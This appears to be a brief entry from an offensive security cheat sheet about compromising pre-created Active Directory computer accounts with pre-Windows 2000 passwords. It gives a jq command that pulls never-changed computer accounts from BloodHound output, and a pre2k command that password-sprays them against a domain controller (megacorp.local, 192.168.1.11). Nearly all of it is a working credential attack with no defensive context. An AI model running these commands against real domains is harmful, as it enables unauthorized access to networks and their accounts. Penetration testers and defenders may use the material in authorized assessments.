Pre-created Computer Accounts & Pre-Windows 2000
Last updated 7 months ago
Search for machines that never updated their passwords:
Initiate a pitchfork spray against them:
$ cat 19700101000000_computers.json | jq '.data[].Properties | select(.enabled == true and .pwdlastset == 0) | .name' -r > pre2k.txt
$ pre2k unauth -d megacorp.local -dc-ip 192.168.1.11 -inputfile pre2k.txt -sleep 10 -jitter 30 -threads 1